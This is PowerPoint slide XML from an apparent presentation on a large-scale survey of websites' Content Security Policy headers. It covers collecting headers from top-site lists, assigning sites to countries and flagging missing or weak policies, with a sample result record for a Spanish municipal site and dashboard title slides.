          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Collect headers </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(Majestic Million* and Cisco Umbrella**)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70BFA65C-A1E8-DEF1-0C45-9FB8478A09A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5705844" y="2226624"/>
            <a:ext cx="5375832" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Parse CSP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB0BE6DE-6DA0-0C23-25FE-FBC644F851DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5705844" y="2959934"/>
            <a:ext cx="5375832" cy="1384995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Assign to Country/Continent (ccTLD, then by IP address, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" err="1">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2503051D-04AA-1729-EC27-B59A26C83336}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5705843" y="4592776"/>
            <a:ext cx="6084641" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Spot CSP Weaknesses / Bypasses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C068A835-7084-A686-E69F-71EA9C9CF9C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5705843" y="5363843"/>
            <a:ext cx="5375833" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Profit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B65AFD7-D779-49B3-89C2-45D9D88EE210}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="540509" y="6249867"/>
            <a:ext cx="4183891" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://majestic.com/reports/majestic-million</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D258909D-614A-7352-9DD4-61637737BE5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4778373" y="6234478"/>
            <a:ext cx="6753225" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>** </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://s3-us-west-1.amazonaws.com/umbrella-static/index.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06D40A6B-F04C-D8E2-C27E-0970C5A45D98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="828675" y="184618"/>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7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The Process</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="372253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017D8A-4CF5-6857-F700-B1FF91C953D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="135718" y="559208"/>
            <a:ext cx="6131732" cy="5632311"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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_id</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'https://aytojaen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.es__https://sede.aytojaen.es/portal/sede/se_principal1.jsp?codResi=1',</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url:</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'https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>aytojaen.es',</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err="1">
                <a:solidFill>
                  <a:srgbClr val="F44747"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>final_url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F44747"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</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'https://sede</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.aytojaen.es/portal/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sede</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/se_principal1.jsp?codResi=1',</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date:</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'20230628 18:42:29'</a:t>
            </a:r>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headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: {</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Date</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'Wed, 28 Jun 2023 18:42:29 GMT',</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        Server: 'Apache/2.4.55 (Unix) OpenSSL/1.1.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mod_jk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/1.2.48'</a:t>
            </a:r>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'Last-Modified'</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'Wed, 28 Jun 2023 18:40:29 GMT'</a:t>
            </a:r>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'Content-Language'</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'es' </a:t>
            </a:r>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'Content-Length'</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'27299'</a:t>
            </a:r>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'Content-Type'</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'text/html'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    },</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>//[…]</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CCCCCC"/>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F1A84345-7A68-A5EF-156A-FB4EDCA3208F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6419850" y="612844"/>
            <a:ext cx="5636432" cy="5632311"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>//[…]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F44747"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: {</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NOCSP</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'No CSP policy was defined'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    },</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F44747"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F44747"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>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host</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'aytojaen.es'</a:t>
            </a:r>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IPv4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: [</a:t>
            </a:r>
          </a:p>
          <a:p>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'77.226.249.70'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    ],</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country</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F44747"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>iso_code</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'ESP'</a:t>
            </a:r>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reason</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'ccTLD'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    },</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continent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: {</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name</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'Europe'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F44747"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>reason</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'ccTLD'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    },</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F44747"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>globalRank</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>395895</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734401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0147-3090-892B-86E4-D6246B180CBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="878889" y="2209348"/>
            <a:ext cx="10582183" cy="2439303"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="12000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dashboard</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="12000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="6600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="12000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF79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10320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shboard2">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFE20C57-EE02-E90F-BD21-E44CEDF0513A}"/>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61753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1397" objId="4"/>
        <p14:stopEvt time="53286" objId="4"/>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0147-3090-892B-86E4-D6246B180CBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="878889" y="2209348"/>
            <a:ext cx="10582183" cy="2439303"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="12000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dashboard</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="12000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="6600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Statistics</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="12000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF79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3856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D3F5138-9EEF-E36F-59B4-58B1DCD0E660}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:extLst>
